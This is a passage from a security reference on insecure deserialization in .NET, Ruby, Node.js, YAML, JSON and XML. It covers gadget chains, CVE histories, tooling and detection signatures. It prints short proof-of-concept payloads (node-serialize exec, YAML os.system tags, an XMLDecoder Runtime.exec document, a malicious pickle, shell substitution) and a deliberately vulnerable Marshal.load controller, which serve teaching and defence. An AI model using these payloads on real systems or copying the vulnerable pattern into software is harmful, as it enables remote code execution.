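    """Append an HMAC-SHA256 tag to the state and base64-encode the result."""
    mac = hmac.new(key, state, hashlib.sha256).digest()
    return base64.b64encode(state + mac).decode("ascii")


def unprotect(token, key):
    """Return the state bytes only if the tag verifies; raise otherwise."""
    raw = base64.b64decode(token, validate=True)
    if len(raw) < MAC_LEN:
        raise ValueError("token too short")
    state, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(key, state, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("MAC check failed; refusing to deserialize")
    return state   # only now may the caller hand the bytes to a parser
```

Anyone who holds the key can call the equivalent of `protect` on an arbitrary payload, which is why a leaked key turns the MAC from a barrier into a formality.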

Notable .NET deserialization CVEs

CVE	Product	Formatter
CVE-2020-25258	Hyland OnBase	BinaryFormatter
CVE-2021-27076	SharePoint (replay-style)	ObjectStateFormatter/ViewState
CVE-2021-29508	Wire (Proto.Actor)	BinaryFormatter
CVE-2022-21969	Exchange Server	BinaryFormatter via MAPI
CVE-2023-3513	Razer Central Service	BinaryFormatter IPC
CVE-2023-5914	CentralSquare	BinaryFormatter
CVE-2023-6184	Third-party ASP.NET app	ViewState
CVE-2025-53770	SharePoint (ToolShell)	ViewState
CVE-2026-20963	SharePoint	Deserialization RCE
CVE-2026-26114	SharePoint	Deserialization RCE

7. Ruby Marshal & YAML

`Marshal.load` — a decade of whack-a-mole

Ruby’s Marshal module is the language’s native binary serialization format. Passing any untrusted bytes to Marshal.load should be treated as arbitrary code execution. The vulnerability was first publicly discussed in a 2013 Ruby bug tracker issue by Charlie Somerville (now Hailey) and has resisted fixes ever since.

class UserRestoreController < ApplicationController
  def show
    user_data = params[:data]
    deserialized = Marshal.load(Base64.decode64(user_data))
    render plain: "Restored: #{deserialized.inspect}"
  end
end

Gadget chain timeline

Year	Gadget / Technique	Target
2013	Initial Marshal warning issue	Ruby 2.0
2016	Phrack #69 — Rails 3/4 Marshal exploit	Rails ≤ 4.0
2018	Luke Jahnke — “Ruby 2.x Universal RCE Deserialization Gadget Chain” (elttam)	Ruby 2.x
2019	CVE-2019-5420 (Rails 5.2 Marshal)	Rails 5.2
2019	Etienne Stalmans — YAML.load universal RCE	Ruby 2.x + Psych
2021	William Bowling — “Universal Deserialisation Gadget for Ruby 2.x–3.x”	Ruby 2.x/3.x
2022	William Bowling — “Round Two” updated gadget	Ruby 3.0/3.1
2024	Alex Leahu (Include Security) — Rails library-based chains	Rails
2024	GitHub Security Lab — JSON/XML/YAML/Marshal CodeQL queries + PoCs	Multi-format
2024	Luke Jahnke — Ruby 3.4 universal RCE + Gem::SafeMarshal escape	Ruby 3.4-rc1

The pattern: each patch closes one entry point reachable from Marshal.load (Ruby's equivalent of readObject), the gadget backend survives, researchers find another entry, repeat. Ruby 3.1 made YAML’s safe_load the default (via Psych 4). Ruby 3.2 patched Marshal gadgets. Ruby 3.4 narrowly avoided shipping with yet another chain.

The Gem::SpecFetcher → Runtime chain (2024)

The current canonical Ruby Marshal universal chain routes through Gem::SpecFetcher, Gem::Version, Gem::RequestSet::Lockfile, Gem::RequestSet, Gem::Resolver::SpecSpecification, Gem::Source::Git, and Gem::Resolver::GitSpecification. The chain ends in shell command substitution: a git invocation is built from an attacker-controlled reference field, and the shell expands the embedded command:

any.zip → reference field contains `$(id > /tmp/pwn)` → git clone executes it

The gadget lives in RubyGems itself — core Ruby — so the only way to patch it is to change RubyGems internals. Doyensec and Trail of Bits have both found successive variants during RubyGems.org audits.

Where Marshal lurks in real apps

Rails cache store with :marshal (the default prior to Rails 7.1)
Rails session store in legacy configurations
Background job backends — Resque, Sidekiq (with Marshal coder), DelayedJob
Cookie-based flash messages in older Rails versions
DRb (distributed Ruby) — entire mechanism is Marshal over sockets
File-based Ruby object storage — .rb.cache, .marshal, .bin

YAML.load and Psych

Psych 4 (Ruby 3.1+) made YAML.load == YAML.safe_load by default. YAML.unsafe_load exists for compatibility. Pre-3.1 code calling YAML.load(user_data) is directly exploitable via !ruby/object: tags that instantiate arbitrary classes:

--- !ruby/object:Gem::Installer
  i: x

Stalmans’s 2019 chain produces ~3 KB of YAML reaching Runtime.exec-equivalent via ERB template evaluation in a Gem::Installer-chained setter.

JSON.parse(create_additions: true)

Ruby’s JSON.parse supports an opt-in mode where {"json_class": "SomeClass", ...} triggers SomeClass.json_create({...}). If any class on the load path defines a vulnerable json_create, this is an RCE path. Oj’s “default mode” enables similar behavior by default.

8. Node.js Deserialization

The `node-serialize` footgun

The npm package node-serialize serializes objects including functions — by wrapping functions as "_$$ND_FUNC$$_function () { ... }" strings and evaling them on deserialize. Passing untrusted input to serialize.unserialize() is direct RCE via IIFE:

const serialize = require('node-serialize');

const payload = {
  rce: "_$$ND_FUNC$$_function(){require('child_process').exec('id',function(e,s){console.log(s)});}()"
};
serialize.unserialize(JSON.stringify(payload));

The trailing () in the function string causes immediate invocation. CVE-2017-5941 covered the original disclosure; the package remains on npm with warnings.

`funcster`, `serialize-javascript`

Similar patterns; serialize-javascript is relatively safer when used to produce output for client consumption but dangerous if the output is deserialized via eval on the server with attacker control.

Prototype pollution adjacency

Node.js deserialization bugs frequently co-occur with prototype pollution (__proto__ key injection via Object.assign, lodash.merge, JSON.parse + merge). A polluted prototype can modify the behavior of deserialization functions used downstream.

YAML in Node.js

In js-yaml versions before 4.0, load() was unsafe and safeLoad() was the safe variant; from 4.0, load() is safe by default. The yaml package is safe by default. Custom schemas and CORE_SCHEMA with type handlers can reintroduce unsafe behavior.

Main sinks to grep for

serialize.unserialize(...)
funcster.deepDeserialize(...)
eval(req.body.something)
new Function(req.body.something)
vm.runInNewContext(untrusted)
js-yaml load() (pre-4.0)
node-phantom, PhantomJS IPC

9. YAML & JSON Format Attacks

YAML is not “just data”

Modern YAML parsers support typed tags (!!, !, !<...>) that trigger class instantiation in the host language:

Language	Unsafe Loader	Tag Syntax
Python (PyYAML <5.1)	`yaml.load`	`!!python/object/apply:os.system ["id"]`
Java (SnakeYAML <2.0)	`Yaml().load`	`!!javax.script.ScriptEngineManager [...]`
Ruby (Psych <4.0)	`YAML.load`	`!ruby/object:Gem::Installer`
.NET (YamlDotNet)	Untyped deserializer	`!System.Diagnostics.Process`
Go (yaml.v2 custom unmarshalers)	Type-dispatched	Typically safe unless reflective

The maintainer response pattern is often to document the danger rather than change defaults, which is why CVEs in YAML libraries keep landing.

CVE-2022-1471 (SnakeYAML)

After at least eight prior related CVEs, SnakeYAML was finally given an umbrella CVE for “insecure by default.” SnakeYAML <2.0’s Yaml().load() accepts !! tags that instantiate arbitrary Java classes. A reachable YAML parser in any Spring/Jackson/REST ingestion path becomes RCE without authentication. Fixed in 2.0 by making SafeConstructor the default.

CVE-2026-24009 (Docling RCE via PyYAML)

A shadow vulnerability: Docling indirectly loaded PyYAML in a path that used yaml.load without an explicit safe loader, regressing when a dependency pin lapsed. The attack surface was document ingestion — upload a crafted document containing a YAML manifest with !!python/object/apply, and Docling parsed it on the server.

JSON deserialization dangers

Plain JSON isn’t directly vulnerable — JSON grammar has no type tags. But:

Polymorphic deserializers (Jackson enableDefaultTyping, Json.NET TypeNameHandling, fastjson autoType) add a @class/$type/@type field that reintroduces type-driven instantiation.
jsonpickle (Python) stores Python objects in JSON and round-trips them through pickle semantics on load.
Oj (Ruby) in :object mode preserves Ruby class info.
JSON.parse in Ruby with create_additions: true dispatches to json_create.

Fastjson (Java) is a notable case: com.alibaba.fastjson.JSON.parseObject(str, Object.class) with autoType enabled has had a continuous stream of RCE chains since 2017 (JdbcRowSetImpl JNDI chain being the canonical one).
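
Because every one of these mechanisms relies on a reserved key in the JSON body, a cheap detection step is to walk incoming documents and flag those keys. The sketch below is one way to do that; the key list is an assumption assembled from the deserializers named above (`py/object` is jsonpickle's tag, `__type` is JavaScriptSerializer's), and `@type` in particular will produce false positives on JSON-LD traffic.

```python
import json

# Assumed list of type-hint keys used by polymorphic deserializers.
TYPE_HINT_KEYS = {"@class", "@type", "$type", "json_class", "py/object", "__type"}


def find_type_hints(node, path="$"):
    """Return (json_path, value) for every type-hint key in a parsed document."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = "%s.%s" % (path, key)
            if key in TYPE_HINT_KEYS:
                hits.append((child, value))
            hits.extend(find_type_hints(value, child))
    elif isinstance(node, list):
        for index, item in enumerate(node):
            hits.extend(find_type_hints(item, "%s[%d]" % (path, index)))
    return hits


sample = json.loads(
    '{"user": {"@class": "com.example.Foo", "items": [{"$type": "System.Object"}]}}'
)
sample_hits = find_type_hints(sample)
```

For `sample`, the function reports the `@class` key under `$.user` and the `$type` key under `$.user.items[0]`. A hit is a reason to check how the endpoint's deserializer is configured, not evidence of exploitation on its own.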

XML deserialization

XMLDecoder (Java) and XML-based formatters in .NET (SoapFormatter, XamlReader.Parse) are equivalent in power to their binary cousins. java.beans.XMLDecoder.readObject parses XML that directly specifies method invocations:

<java>
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <string>calc</string>
    </void>
  </object>
</java>

XStream’s default configuration before 1.4.18 allowed similar arbitrary-class instantiation; dozens of CVEs (CVE-2021-21344 through CVE-2021-39154 and onward) document the gadget chain parade.
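Because an XMLDecoder document is a list of method invocations, it can be triaged statically by listing those invocations instead of decoding it. A rough Python sketch follows; `list_invocations` is a hypothetical helper, and Python's `xml.etree.ElementTree` is not hardened against malicious XML, so this is meant for offline analysis of captured samples only.

```python
import xml.etree.ElementTree as ET

SAMPLE = """<java>
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <string>calc</string>
    </void>
  </object>
</java>"""


def list_invocations(xml_text: str) -> list[tuple[str, str]]:
    """Return (class, method) pairs that an XMLDecoder document would invoke."""
    root = ET.fromstring(xml_text)
    calls = []
    for element in root.iter():  # document order
        if element.tag in {"object", "void"} and "method" in element.attrib:
            # <void method=...> is invoked on the enclosing object's result.
            target = element.get("class", "<result of parent>")
            calls.append((target, element.get("method")))
    return calls


calls = list_invocations(SAMPLE)
```

For the sample above, the listing shows `getRuntime` on `java.lang.Runtime` followed by `exec` on its result, which is the whole exploit.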

10. Gadget Chains Explained

The chain-of-method-dispatch abstraction

A gadget chain is a sequence of class method invocations connected by field references, where:

Entry gadget — a class whose readObject, __wakeup, __destruct, __reduce__, etc. is called automatically during deserialization and does something more than set fields.
Relay gadgets — classes whose methods (called by the previous gadget) make further method calls on attacker-controlled fields, propagating control flow.
Sink gadget — terminal class whose invoked method reaches a native “do something dangerous” primitive (exec, eval, system, file write, reflection invoke, HTTP request, deserialize-again).

The attacker picks an object type for each field so that the “dynamic dispatch” at each link points to the next gadget. The chain is then serialized and submitted to the sink.

Why chains exist (the Russian doll metaphor)

No sane developer writes readObject to call Runtime.exec directly. But developers write readObject methods that call this.field.someMethod(), where someMethod is an interface method. The JVM / PHP / Python runtime resolves someMethod at dispatch time based on the actual class of this.field. Swap this.field for a LazyMap or an InvokerTransformer and you’ve changed the target of the call without changing the call site.
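The dispatch swap can be sketched with a toy deserializer. Everything here is hypothetical (the class names, the `on_load` hook, and the dict-based stream format); the sink only records its argument instead of executing anything. The point is that the call site in `CacheEntry.on_load` never changes, while the stream decides what it reaches.

```python
calls = []  # the sink records what it was asked to run instead of running it


class CacheEntry:
    """Entry gadget: its load hook calls a method on a field."""

    def __init__(self, loader):
        self.loader = loader

    def on_load(self):
        return self.loader.fetch()  # innocent-looking call site


class FileLoader:
    """What the developer expected the field to hold."""

    def __init__(self, path):
        self.path = path

    def fetch(self):
        return f"contents of {self.path}"


class LazyProxy:
    """Relay gadget: forwards fetch() to a method on another controlled field."""

    def __init__(self, target, arg):
        self.target = target
        self.arg = arg

    def fetch(self):
        return self.target.run(self.arg)


class CommandRunner:
    """Sink gadget: stands in for Runtime.exec or os.system."""

    def run(self, arg):
        calls.append(arg)
        return "executed"


REGISTRY = {c.__name__: c for c in (CacheEntry, FileLoader, LazyProxy, CommandRunner)}


def rebuild(node):
    """Toy deserializer: the stream names the class of every nested object."""
    if isinstance(node, dict) and "type" in node:
        fields = {k: rebuild(v) for k, v in node.items() if k != "type"}
        return REGISTRY[node["type"]](**fields)
    return node


def deserialize(stream):
    obj = rebuild(stream)
    if hasattr(obj, "on_load"):
        obj.on_load()  # fires automatically, like readObject or __wakeup
    return obj


expected = {"type": "CacheEntry", "loader": {"type": "FileLoader", "path": "/tmp/a"}}
hostile = {
    "type": "CacheEntry",
    "loader": {"type": "LazyProxy", "target": {"type": "CommandRunner"}, "arg": "id"},
}
```

Deserializing `expected` never touches the sink; deserializing `hostile` reaches `CommandRunner.run("id")` through the same `on_load` code.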

Gadget hunting methodology

Seed set: find all classes implementing the deserializable marker (java.io.Serializable, PHP __wakeup/__destruct, Python __reduce__, .NET [Serializable]).
Entry set: filter to classes whose deserialization-time methods do more than field assignment — call any method on a field, any reflection API, any eval-equivalent.
Graph expansion: for each entry, model “what methods does this call on fields I control?” Traverse the call graph backward from known sinks (Runtime.exec, eval, system, include).
Constraint solving: each edge has type requirements (the field must be assignable to an interface that has the called method); solve for a feasible object graph.
Serializability filter: every node in the graph must itself be deserializable by the target format.
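The steps above amount to a constrained path search over a call graph. The sketch below is a deliberately small illustration, not how Gadget Inspector or any real tool is implemented: the graph, class names, and `find_chains` function are made up, and it searches forward from entry points rather than backward from sinks to keep the code short.

```python
from collections import deque

# Hypothetical call graph: method -> methods it may invoke on attacker-controlled fields.
CALL_GRAPH = {
    "CacheEntry.readObject": ["Loader.fetch"],
    "Loader.fetch": ["LazyProxy.fetch", "FileLoader.fetch", "ScriptLoader.fetch"],
    "LazyProxy.fetch": ["Transformer.transform"],
    "Transformer.transform": ["Runtime.exec"],
    "ScriptLoader.fetch": ["Runtime.exec"],
    "FileLoader.fetch": [],
    "AuditLog.readObject": ["Formatter.format"],
    "Formatter.format": [],
}
ENTRY_POINTS = ["CacheEntry.readObject", "AuditLog.readObject"]
SINKS = {"Runtime.exec"}
# ScriptLoader is deliberately absent: it cannot appear in a serialized graph.
SERIALIZABLE = {"CacheEntry", "Loader", "LazyProxy", "Transformer",
                "FileLoader", "AuditLog", "Formatter"}


def find_chains(graph, entries, sinks, serializable):
    """Breadth-first search for entry-to-sink paths through serializable classes."""
    chains = []
    for entry in entries:
        queue = deque([[entry]])
        while queue:
            path = queue.popleft()
            for callee in graph.get(path[-1], []):
                if callee in path:  # skip cycles
                    continue
                if callee in sinks:
                    chains.append(path + [callee])
                    continue
                if callee.split(".")[0] not in serializable:
                    continue  # serializability filter prunes this branch
                queue.append(path + [callee])
    return chains


chains = find_chains(CALL_GRAPH, ENTRY_POINTS, SINKS, SERIALIZABLE)
```

Only the `LazyProxy` route survives; the shorter `ScriptLoader` route is pruned because that class could never be part of the deserialized object graph.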

Automated gadget discovery tools

Tool	Language	Approach
Gadget Inspector	Java	Bytecode analysis; finds call-graph paths from `readObject` to sinks
JOOGIE	Java	Static data-flow analysis
SerHyBrid	Java	Hybrid static/dynamic exploration
PHPGGC	PHP	Curated chain database with generator CLI
Fickling	Python	Pickle bytecode parser, static analyzer, and gadget constructor
PickleBall	Python	Per-library policy generator, not discovery
Freddy (Burp)	Multi	Deserialization payload injector with ~30 known chains
ysoserial / ysoserial.net	Java / .NET	Payload generator for ~30 known Java chains, ~15 .NET
marshalsec	Java	Non-JDK serialization formats (Jackson, XStream, Kryo, Hessian, JYaml, Red5)
GadgetProbe	Java	DNS-based blind probing to fingerprint classpath classes

The “unpatchable” property

A gadget chain is a path through the classpath. Patching one class on the path closes that specific path but leaves every other path open. The set of gadgets on a modern enterprise Java classpath is combinatorially enormous — any library that does reflection, method dispatch on attacker-controlled fields, or custom deserialization logic is a potential source of gadgets. This is why the only durable fix is to not deserialize untrusted data in native formats.

11. Real-World CVEs & Exploitation Chains

Java

CVE	Product	Chain / Trigger
CVE-2015-4852	WebLogic	CommonsCollections over T3
CVE-2015-7501	JBoss/Jenkins	CommonsCollections via `/invoker/JMXInvokerServlet`
CVE-2016-1000031	Apache Commons FileUpload	`DiskFileItem` reflective file write
CVE-2017-5638	Struts2 (S2-045)	OGNL via Content-Type (not pure deser, related family)
CVE-2017-10271	WebLogic	XMLDecoder on WLS-wsat `/wls-wsat/CoordinatorPortType`
CVE-2018-7489	Jackson-databind	`c3p0` gadget via default typing
CVE-2019-2725	WebLogic	XMLDecoder unauthenticated RCE
CVE-2019-17571	Log4j 1.x `SocketServer`	`ObjectInputStream` on log socket
CVE-2021-44228	Log4Shell	JNDI lookup (adjacent but not pure deser)
CVE-2022-1471	SnakeYAML	`!!ScriptEngineManager` with URLClassLoader
CVE-2022-22963	Spring Cloud Function	SpEL via `spring.cloud.function.routing-expression`
CVE-2022-22965	Spring4Shell	`class.module.classLoader` binding exposure
CVE-2022-33980	Apache Commons Configuration	Script interpolator
CVE-2023-22518	Confluence	Improper authorization on setup/restore endpoints (adjacent, not pure deser)
CVE-2024-36991	Splunk	Path traversal → file-based deser
CVE-2026-33728	dd-trace-java RMI instrumentation	Unsafe deserialization in RMI instrumentation may lead to RCE
CVE-2026-33439	OpenAM	Pre-auth RCE via Java deserialization

PHP

CVE	Product	Chain
CVE-2015-8562	Joomla	User-Agent injection → session deser → POP chain
CVE-2016-9920	PhpMyAdmin	`__destruct` file write
CVE-2017-12794	Symfony	Property injection via session cookie
CVE-2020-15148	Yii 2	`__destruct` via `BatchQueryResult`
CVE-2019-6340	Drupal 8	REST `_type` POP chain
CVE-2019-11043	PHP-FPM	Adjacent (not pure deser)
CVE-2020-28949	Archive_Tar	Phar deser via tar extract
CVE-2021-41773	Apache HTTP Server	Path traversal (adjacent, not pure deser)
CVE-2023-1671	Sophos Web Appliance	PHP deser RCE
CVE-2024-4577	PHP CGI	Adjacent argument injection
CVE-2026-3422	U-Office Force	Critical RCE via insecure deserialization

Python

CVE	Product	Pattern
CVE-2017-7610	Ansible Tower	YAML deser
CVE-2019-20477	PyYAML	`FullLoader` bypass
CVE-2020-14343	PyYAML	Bypass of earlier fix
CVE-2022-0330	graphql-python	`pickle` session
CVE-2023-27586	torch.load	Pre-weights_only default
CVE-2025-32444	vLLM Mooncake	ZeroMQ `recv_pyobj()` on 0.0.0.0 (CVSS 10.0)
CVE-2025-24357	vLLM	Torch checkpoint untrusted load
CVE-2026-24009	Docling	PyYAML regression via unpinned dep
CVE-2026-25769	Wazuh	Critical RCE via unsafe deserialization
CVE-2026-26220	LightLLM	WebSocket pickle with broken nonce auth
CVE (picklescan)	picklescan	4 separate bypass CVEs in 2025 (Sonatype)
CVE (picklescan)	picklescan	3 zero-days disclosed by JFrog
(CVE not cited)	IBM Langflow Desktop	RCE via insecure deserialization

.NET

CVE	Product	Pattern
CVE-2017-9424	SharePoint	XmlSerializer with untyped payload
CVE-2019-0604	SharePoint	XmlSerializer via `ItemMetadata`
CVE-2020-0688	Exchange	ViewState forgery with static machine key
CVE-2020-0932	SharePoint	BinaryFormatter
CVE-2020-25258	Hyland OnBase	BinaryFormatter
CVE-2021-27076	SharePoint	Replay-style ObjectStateFormatter
CVE-2021-29508	Wire (Proto.Actor)	BinaryFormatter-backed IPC
CVE-2022-21969	Exchange	BinaryFormatter in MAPI
CVE-2023-3513	Razer Central	BinaryFormatter named pipe
CVE-2023-5914	CentralSquare	BinaryFormatter
CVE-2024-29847	Ivanti EPM	Agent Portal deserialization
CVE-2024-38094	SharePoint	XML deserialization
CVE-2025-53770	SharePoint ToolShell	ViewState deser chain, actively exploited
CVE-2026-20963	SharePoint	Deserialization RCE
CVE-2026-26114	SharePoint	Deserialization RCE
(CVE not cited)	SolarWinds Web Help Desk	Java (not .NET) deserialization enabling command execution

Ruby

CVE	Product	Pattern
CVE-2013-0156	Rails	YAML in XML params
CVE-2019-5420	Rails 5.2	Guessable development-mode `secret_key_base` lets attackers forge signed Marshal payloads
CVE-2020-8163	Rails	Local variables in partials
CVE-2022-32224	Rails	YAML-serialized Active Record columns loaded with `YAML.unsafe_load`
—	RubyGems.org	Multiple informational-severity Marshal issues (ToB audit)

Notable exploitation chains

SharePoint ToolShell (CVE-2025-53770, July 2025). Unauthenticated attackers POST a crafted request to /_layouts/15/ToolPane.aspx with a __VIEWSTATE carrying a deserialization payload (TextFormattingRunProperties → XAML → Process.Start). The webshell then parses additional VIEWSTATE-encoded commands. Check Point Research observed 4,600+ compromise attempts across 300+ organizations in one week; the same IPs chained Ivanti EPMM CVE-2025-4427/4428 for lateral movement. Mitigation required rotating ASP.NET machine keys in addition to patching.

WebLogic Christmas (CVE-2015-4852 → CVE-2017-10271 → CVE-2019-2725 → …). A continuous stream of deserialization RCEs against Oracle WebLogic over a 5+ year window. Each patch closed one reachable deserializer endpoint; the next CVE found another (T3 → IIOP → XMLDecoder in wls-wsat → async SOAP → …). Illustrates the “cannot patch your way out” property at enterprise scale.

Jenkins Jenkinspocalypse (CVE-2015-8103, CVE-2016-0792, CVE-2016-9299). Unauthenticated Jenkins instances exposed a CLI port that accepted serialized Java objects. CommonsCollections gadget was directly applicable. Thousands of public Jenkins instances fell in the ensuing mass-exploitation wave.

Equifax (CVE-2017-5638, Struts2). Not pure deserialization — OGNL injection via Content-Type — but illustrates the same root cause: attacker-controlled data reaches a VM that interprets it as code. Directly led to the exposure of 147 million records.

Log4Shell adjacency (CVE-2021-44228). JNDI lookups embedded in log strings fetch remote Reference objects; upon resolution, the javaSerializedData field is deserialized via the classic JDK path, re-entering the deserialization attack family through a logging front door.

12. Tools & Automation

Offensive tooling (used defensively for payload generation, detection, and validation)

Tool	Language	Purpose
ysoserial	Java	Canonical Java deserialization payload generator (~30 chains)
ysoserial.net	.NET	Equivalent for .NET with ~15 gadget families including XAML chains
marshalsec	Java	Non-JDK formats: Jackson, XStream, Kryo, Hessian, JYaml, Red5, JSON-IO
PHPGGC	PHP	Curated PHP POP chain database and payload generator
Fickling	Python	Pickle decompiler, static analyzer, payload constructor
ModelScan	Python	ML model file scanner (ProtectAI)
picklescan	Python	Blocklist-based pickle scanner used by Hugging Face (known bypasses exist)
GadgetProbe	Java	DNS-based blind classpath fingerprinting
Freddy	Burp plugin	Injects deserialization payloads across formats
SerialKiller	Java	Runtime allowlist enforcement (wrap around `ObjectInputStream`)
not-so-serial	Java	Runtime blocklist enforcement
ConstructionInspector	Java	Build-time gadget detection via classpath analysis
Semgrep rules	Multi	Trail of Bits published rules for Ruby (`marshal-load-method`, `rails-cache-store-marshal`, `yaml-unsafe-load`, `json-create-deserialization`)
CodeQL queries	Multi	GitHub Security Lab publishes unsafe-deserialization queries for Java, Ruby, Python, C#

ysoserial usage (defensive validation)

Security teams use ysoserial to validate that patches, allowlists, and WAF rules actually block known payloads. The tool takes a chain name and a command, and emits serialized bytes suitable for piping into a test harness that stands in for your application’s deserialization sink. Each chain has its own library prerequisites, which must be on the target classpath for the payload to succeed.

marshalsec

Moritz Bechler’s marshalsec covers the non-JDK format space (Jackson, XStream, Kryo, Hessian, JYaml, etc.). It is the reference for understanding that “Java deserialization” is not just ObjectInputStream — every polymorphic serializer in the ecosystem has the same category of bug.

PHPGGC

./phpggc Monolog/RCE1 system id produces a serialized payload for the Monolog RCE1 chain. Chains are namespaced by target library: Laravel/RCE1..n, Drupal/RCE1..n, Symfony/RCE1..n, WordPress/RCE1..n, PrestaShop/RCE1..n, Yii/RCE1..n, and many more. Use -l <keyword> to list the chains available in your PHPGGC version, -u to URL-encode, -b to base64-encode, and --phar to produce a PHAR file (for the phar:// trick).

Fickling

Trail of Bits’s Fickling disassembles pickle bytecode (a static analysis step no generic analyzer performs by default). It can detect known-malicious patterns, decompile pickle opcodes to pseudo-Python, and construct payloads to test defenses. Critically, it demonstrates how trivially pickle exploitation generalizes — any callable reachable from Python’s import system is a gadget.
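The core idea of static pickle inspection can be shown with the standard library alone. This is a simplified sketch of the concept, not Fickling's implementation: `imported_globals` is a hypothetical helper built on `pickletools.genops`, which walks opcodes without executing them. The `STACK_GLOBAL` handling is a heuristic that assumes the module and attribute names were pushed as the two most recent string literals, which a crafted pickle can violate (for example by fetching them from the memo).

```python
import pickle
import pickletools
from collections import OrderedDict


def imported_globals(data: bytes) -> list[str]:
    """List every module.attribute a pickle would import, without running it."""
    found = []
    recent_strings = []  # string pushes that may feed a later STACK_GLOBAL
    for opcode, arg, _position in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # pickletools reports the argument as "module name"
            module, name = arg.split(" ", 1)
            found.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL":
            if len(recent_strings) >= 2:
                found.append(".".join(recent_strings[-2:]))
            else:
                found.append("<unresolved STACK_GLOBAL>")
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


# Classic protocol-0 payload that would call os.system("id") if it were loaded.
HOSTILE = b"cos\nsystem\n(S'id'\ntR."

hostile_imports = imported_globals(HOSTILE)
legacy_imports = imported_globals(pickle.dumps(OrderedDict, protocol=2, fix_imports=False))
modern_imports = imported_globals(pickle.dumps(OrderedDict, protocol=4))
plain_data_imports = imported_globals(pickle.dumps({"a": [1, 2]}))
```

A pickle made only of plain containers imports nothing, so any non-empty result is worth a look; deciding which imports are acceptable is the hard part that real tools address.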

Build-time detection

Dependency scanning: identify commons-collections, commons-beanutils, spring-core, jackson-databind, xstream, groovy, hibernate, c3p0, rome, snakeyaml versions against known-vulnerable ranges.
Classpath hygiene: remove unused libraries. A gadget in an unused library is still a gadget.
SBOM generation: CycloneDX/SPDX inventories plus vulnerability databases (OSS Index, GHSA) will catch most known-bad versions.

Runtime detection

Java: ObjectInputFilter (JEP 290; JDK 9+, backported to 8u121, 7u131, and 6u141) allowlists or blocklists classes during readObject. Because it can be configured process-wide through the jdk.serialFilter property, it also covers legacy code that cannot be rewritten.
.NET: the Binder property on BinaryFormatter (a SerializationBinder) allows restricting types; however, Microsoft’s own guidance states this is insufficient and BinaryFormatter should be retired entirely.
Ruby: Marshal.load has no type filter. Wrap in a custom class-checking loader or migrate.
Python: subclassing pickle.Unpickler and overriding find_class to allowlist is the documented approach. It works but is fragile — see picklescan bypass research.
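For the Python case, the allowlisting approach follows the pattern shown in the standard library documentation for `pickle`. The sketch below adapts that pattern; `SAFE_BUILTINS` and `restricted_loads` are illustrative names, and the allowlist contents are an assumption that would need to be tailored (and kept very small) for a real application.

```python
import builtins
import io
import pickle

# Illustrative allowlist: only a few harmless builtins may be referenced.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream asks to import.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads() that enforces the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


allowed = restricted_loads(pickle.dumps([1, 2, range(15)]))

try:
    # Protocol-0 payload that would run a shell command under plain pickle.loads().
    restricted_loads(b"cos\nsystem\n(S'echo hello world'\ntR.")
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

The lookup fails before the callable is ever resolved, so the payload's `REDUCE` step is never reached. The fragility comes from what ends up on the allowlist: any allowed class with a dangerous constructor or `__setstate__` reopens the door.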

13. Detection & Static Analysis

Taint source → sink patterns

Language	Source	Sink
Java	`HttpServletRequest.getInputStream()`	`new ObjectInputStream(...).readObject()`
Java	`request.getParameter(...)` → `Base64.decode`	`readObject`, `XMLDecoder.readObject`
PHP	`$_GET`, `$_POST`, `$_COOKIE`, `file_get_contents("php://input")`	`unserialize`, `yaml_parse`
PHP	Any user-controlled path	`file_exists("phar://$path")`, `filesize`, `is_dir`
Python	`request.data`, `websocket.receive_bytes`, `socket.recv`	`pickle.loads`, `joblib.load`, `torch.load`
Python	File path from DB / config / upload	`yaml.load`, `yaml.unsafe_load`
.NET	`Request.Form`, `Request.InputStream`, `Request["__VIEWSTATE"]`	`BinaryFormatter.Deserialize`, `ObjectStateFormatter.Deserialize`
.NET	`Request.Form`, `Request.InputStream`, JSON request bodies	`JsonConvert.DeserializeObject` with `TypeNameHandling != None`
Ruby	`params[:data]`, `cookies[:session]`	`Marshal.load`, `YAML.load` (unsafe), `Oj.load` default
Node.js	`req.body`, `req.query`	`serialize.unserialize`, `eval`, `vm.runInNewContext`

CodeQL query shape

GitHub Security Lab’s unsafe deserialization queries model:

A set of known-dangerous deserialization calls as sinks.
A standard HTTP-input taint source set.
An intermediate “encoding” sanitizer set that does not actually sanitize but is often wrongly assumed to (Base64, URL-decode, JSON.parse).
Path constraints requiring the sink to be reachable from the source without passing through type-safe deserializers.

Semgrep / grep signatures

# Java
pattern: new ObjectInputStream($X).readObject()
pattern: new XMLDecoder(...).readObject()
pattern: new Yaml().load($X)        # SnakeYAML
pattern: $MAPPER.enableDefaultTyping()
pattern: new XStream().fromXML($X)   # without setupDefaultSecurity
pattern: $KRYO.readClassAndObject(...)

# PHP
pattern: unserialize($_...)
pattern: unserialize($$X) where $$X from $_GET/$_POST/$_COOKIE
pattern: yaml_parse($X)
pattern: file operation on user-controlled "phar://..."

# Python
pattern: pickle.loads(...)
pattern: pickle.load(...)
pattern: joblib.load(...)
pattern: torch.load(...)            # without weights_only=True
pattern: numpy.load(..., allow_pickle=True)
pattern: yaml.load($X)              # without SafeLoader
pattern: yaml.unsafe_load(...)
pattern: recv_pyobj()

# .NET
pattern: new BinaryFormatter().Deserialize(...)
pattern: new SoapFormatter().Deserialize(...)
pattern: new NetDataContractSerializer().ReadObject(...)
pattern: new ObjectStateFormatter().Deserialize(...)
pattern: new LosFormatter().Deserialize(...)
pattern: JsonConvert.DeserializeObject<$T>(..., settings with TypeNameHandling.All|Objects|Arrays|Auto)
pattern: new JavaScriptSerializer(new SimpleTypeResolver())

# Ruby
pattern: Marshal.load(...)
